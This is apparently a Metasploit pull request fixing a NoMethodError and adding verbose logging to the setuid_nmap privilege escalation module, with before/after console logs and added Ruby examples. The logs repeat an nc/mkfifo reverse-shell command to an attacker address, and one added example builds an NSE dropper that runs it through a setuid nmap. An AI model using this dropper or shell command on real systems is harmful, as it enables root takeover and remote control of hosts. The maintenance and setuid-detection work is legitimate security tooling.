Fix crash and add additional logging to the setuid nmap module #15695

Merged: 1 commit, Sep 21, 2021

Conversation

adfoster-r7 (Contributor)

Before

The module fails, there's no information why, and there's a miscellaneous NoMethodError printed to the user:

msf6 exploit(unix/local/setuid_nmap) > rerun session=-1 lhost=192.168.49.180 lport=80 verbose=true
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.49.180:80 
[*] Dropping lua /tmp/nkpLoovk.nse
[*] Running /tmp/nkpLoovk.nse with Nmap
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

After

The nmap command is now logged in verbose mode, and the NoMethodError has been fixed:

msf6 exploit(unix/local/setuid_nmap) > rerun session=-1 lhost=192.168.49.180 lport=80 verbose=true
[*] Reloading module...

[+] mkfifo /tmp/rujjoq; nc 192.168.49.180 80 0</tmp/rujjoq | /bin/sh >/tmp/rujjoq 2>&1; rm /tmp/rujjoq
[*] Started reverse TCP handler on 192.168.49.180:80 
[*] Dropping lua /tmp/fBIuDAnn.nse
[*] Running /tmp/fBIuDAnn.nse with Nmap
[*] 
Starting Nmap 7.40 ( https://nmap.org ) at 2021-09-20 20:47 EDT
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

sh: 1: nc: not found
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:622: /usr/bin/../share/nmap/scripts/../../../../../../../../../../tmp/fBIuDAnn.nse is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:622: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:820: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
        [C]: in ?

QUITTING!
[*] Exploit completed, but no session was created.

It's now clear to the user that nc isn't available and a different payload should be used.

Verification

Open a linux session on a target which has a setuid nmap binary.
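Added example for this thread, not code from the setuid_nmap module or the framework: the two halves of the technique the module automates, written the way a practitioner would script them by hand. First, a check for nmap binaries carrying the setuid bit, which is the precondition the verification step names. Second, the NSE script to drop: nmap's script engine executes a script's top-level code while loading it, so a bare os.execute fires before nmap notices the missing 'action' field (that is the "missing required field: 'action'" error in the logs above). The Lua body and the --script invocation follow the public GTFOBins entry for nmap, not anything this PR shows; the fake setuid binary in the demo is constructed in a throwaway directory, and the payload command is the one from the verification log.

```ruby
require 'tmpdir'

# Added example (not the module's code). Assumptions: nmap loads an NSE
# file as a Lua chunk and runs its top level before validating fields;
# `nmap --script=<file>` is the GTFOBins invocation, not one shown in the PR.

# Returns paths of files named `name` in `dirs` that have the setuid bit set.
# This is the precondition check for the module: a setuid nmap binary.
def setuid_binaries(dirs, name: 'nmap')
  dirs.flat_map { |d| Dir.glob(File.join(d, name)) }
      .select { |p| st = File.stat(p); st.file? && st.setuid? }
end

# Builds the NSE dropper. Lua long brackets ([==[ ... ]==]) let the payload
# contain quotes and redirections without escaping; the only forbidden
# sequence is the terminator itself.
def build_nse(cmd)
  raise ArgumentError, 'command contains the long-bracket terminator' if cmd.include?(']==]')
  "os.execute([==[#{cmd}]==])\n"
end

# argv for running the dropped script through the setuid binary (not executed
# here). The top-level os.execute runs during script load, so the command
# fires even though nmap then aborts on the missing 'action' field.
def nmap_argv(nmap_path, nse_path)
  [nmap_path, "--script=#{nse_path}"]
end

if $PROGRAM_NAME == __FILE__
  # Constructed demonstration: a fake "nmap" with mode 4755 in a temp dir so
  # the detector has something to find; real install dirs are also scanned.
  Dir.mktmpdir do |dir|
    fake = File.join(dir, 'nmap')
    File.write(fake, '')
    File.chmod(0o4755, fake)
    found = setuid_binaries([dir, '/usr/bin', '/usr/local/bin'])
    puts "setuid nmap candidates: #{found.inspect}"
    payload = 'mkfifo /tmp/f; nc 192.168.49.180 80 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f'
    puts build_nse(payload)
    puts nmap_argv(found.first || '/usr/bin/nmap', '/tmp/x.nse').join(' ')
  end
end
```

The detector is also the defensive check: the same `setuid_binaries` call over `/usr/bin` and `/usr/local/bin` on a fleet tells you which hosts still carry the configuration nmap itself warns about ("Running Nmap setuid, as you are doing, is a major security risk").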

@@ -181,6 +181,8 @@ def expand_path(path)
#
# @param path [String] Remote filename to check
def file?(path)
return false if path.nil?
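Review bot: the yardoc two lines up still reads `@param path [String] Remote filename to check`, but the new `return false if path.nil?` makes nil an accepted input; change the tag to `[String, nil]` and add an `@return [Boolean]` line stating that nil yields false, so the documented contract matches the guard. Guarding inside `file?` also only fixes this one helper: the caller reaches it as `rm_f(lua_file, exe_file)` with a nil second argument, so a `compact` on the caller side (or not passing a file that was never dropped) would stop the module from depending on every file helper tolerating nil.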
@adfoster-r7 adfoster-r7 (Author) Sep 21, 2021
rm_rf was being called in the module with nil via rm_f(lua_file, exe_file). This was previously safe to do, but was broken recently by this change from exist? to file?

https://github.com/rapid7/metasploit-framework/pull/15403/files#diff-cc6585bd12e8d43e126c2e1a79e4132f56c1e180483f410ccbf90cfb04c5e5c8R478
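Added example for this thread; it is not code from the exploit/unix/local/setuid_nmap module or from the framework's file helpers. It reproduces the failure pattern the comment above describes: cleanup hands a nil path to a String-only check, and the NoMethodError raised during cleanup masks the real reason the exploit failed (nc missing on the target). FakeTarget stands in for the remote session (an assumption), the nmap output is a constructed sample shaped like the logs above, and the reason exe_file is nil (a command payload drops no executable) is my assumption; the PR only says rm_f was called with nil.

```ruby
# Added example, not the module's or framework's code. FakeTarget is an
# assumed stand-in for the remote session; the nmap output is constructed.

class FakeTarget
  attr_reader :files, :log

  def initialize(files)
    @files = files.dup    # constructed remote filesystem: paths that exist
    @log = []
  end

  # Pre-fix shape: indexes into path as a String, so a nil path raises
  # NoMethodError (undefined method `[]' for nil).
  def file_unguarded?(path)
    path[0] == '/' && @files.include?(path)
  end

  # Post-fix shape, matching the guard added in the hunk above.
  def file?(path)
    return false if path.nil?
    path[0] == '/' && @files.include?(path)
  end

  # Mirrors rm_f(lua_file, exe_file): every argument goes through the check.
  def rm_f(*paths, checker: :file?)
    paths.each do |p|
      next unless send(checker, p)
      @files.delete(p)
      @log << "rm -f #{p}"
    end
  end
end

# One simulated exploit run. exe_file is nil on purpose (assumption: a
# command payload drops no executable, so there is nothing to clean up).
def run_exploit(target, lua_file, exe_file, checker: :file?)
  # Constructed stand-in for what nmap printed in the verification logs.
  nmap_output = "sh: 1: nc: not found\nNSE: failed to initialize the script engine:\n"
  reason = nil
  begin
    target.log << nmap_output
    reason = nmap_output.lines.first.strip   # the diagnostic the user needs
  ensure
    target.rm_f(lua_file, exe_file, checker: checker)   # cleanup always runs
  end
  { status: :completed, reason: reason, files_left: target.files }
rescue NoMethodError => e
  # Pre-fix: this is the "Exploit failed: NoMethodError" the user saw; the
  # nc diagnostic collected above is lost with it.
  { status: :crashed, reason: "NoMethodError #{e.message}", files_left: target.files }
end

if $PROGRAM_NAME == __FILE__
  before = run_exploit(FakeTarget.new(['/tmp/nkpLoovk.nse']), '/tmp/nkpLoovk.nse', nil,
                       checker: :file_unguarded?)
  after  = run_exploit(FakeTarget.new(['/tmp/fBIuDAnn.nse']), '/tmp/fBIuDAnn.nse', nil)
  puts "before: #{before[:status]} (#{before[:reason]})"
  puts "after:  #{after[:status]} (#{after[:reason]})"
end
```

Note that in both runs the dropped .nse file is removed before the nil argument is reached, so the crash left no artifact behind; what it cost was the diagnostic. Cleanup code in an exploit module has to be at least as tolerant of partial state as the exploit path that preceded it, or the only error the operator ever sees is the one from teardown.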

@adfoster-r7 adfoster-r7 changed the title Improve setuid nmap module Fix crash and add additional logging to the setuid nmap module Sep 21, 2021
@space-r7 space-r7 self-assigned this Sep 21, 2021
@space-r7 (Contributor)

This looks good to me! Tests before and after change:

Before

msf6 exploit(unix/local/setuid_nmap) > set session 1
session => 1
msf6 exploit(unix/local/setuid_nmap) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Dropping lua /tmp/udoXcsdM.nse
[*] Running /tmp/udoXcsdM.nse with Nmap
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

Module now reports that nmap is not installed instead of throwing an error.

msf6 exploit(unix/local/setuid_nmap) > run verbose=true

[+] mkfifo /tmp/lwldty; nc 192.168.140.1 4444 0</tmp/lwldty | /bin/sh >/tmp/lwldty 2>&1; rm /tmp/lwldty
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Dropping lua /tmp/tJOXGkhZ.nse
[*] Running /tmp/tJOXGkhZ.nse with Nmap
[*] /bin/sh: 1: /usr/bin/nmap: not found
[*] Exploit completed, but no session was created.

When netcat is unavailable:

msf6 exploit(unix/local/setuid_nmap) > run verbose=true

[+] mkfifo /tmp/zneeh; nc 192.168.140.1 4444 0</tmp/zneeh | /bin/sh >/tmp/zneeh 2>&1; rm /tmp/zneeh
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Dropping lua /tmp/HDSxDqWg.nse
[*] Running /tmp/HDSxDqWg.nse with Nmap
[*] Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 11:59 PDT
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

WARNING: Running Nmap setgid, as you are doing, is a major security risk.

sh: 1: nc: not found
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:621: /usr/bin/../share/nmap/scripts/../../../../../../../../../../tmp/HDSxDqWg.nse is missing required field: 'action'
stack traceback:
	[C]: in function 'error'
	/usr/bin/../share/nmap/nse_main.lua:621: in field 'new'
	/usr/bin/../share/nmap/nse_main.lua:823: in local 'get_chosen_scripts'
	/usr/bin/../share/nmap/nse_main.lua:1310: in main chunk
	[C]: in ?

QUITTING!

@space-r7 space-r7 added the rn-fix release notes fix label Sep 21, 2021
@space-r7 space-r7 merged commit b24b6d8 into rapid7:master Sep 21, 2021
@space-r7 (Contributor)

Release Notes

This fixes a crash in the exploit/unix/local/setuid_nmap module and adds logging to print the result of the exploit's last command so the user knows what happened in the event of a failure.

@space-r7 space-r7 added the bug label Sep 21, 2021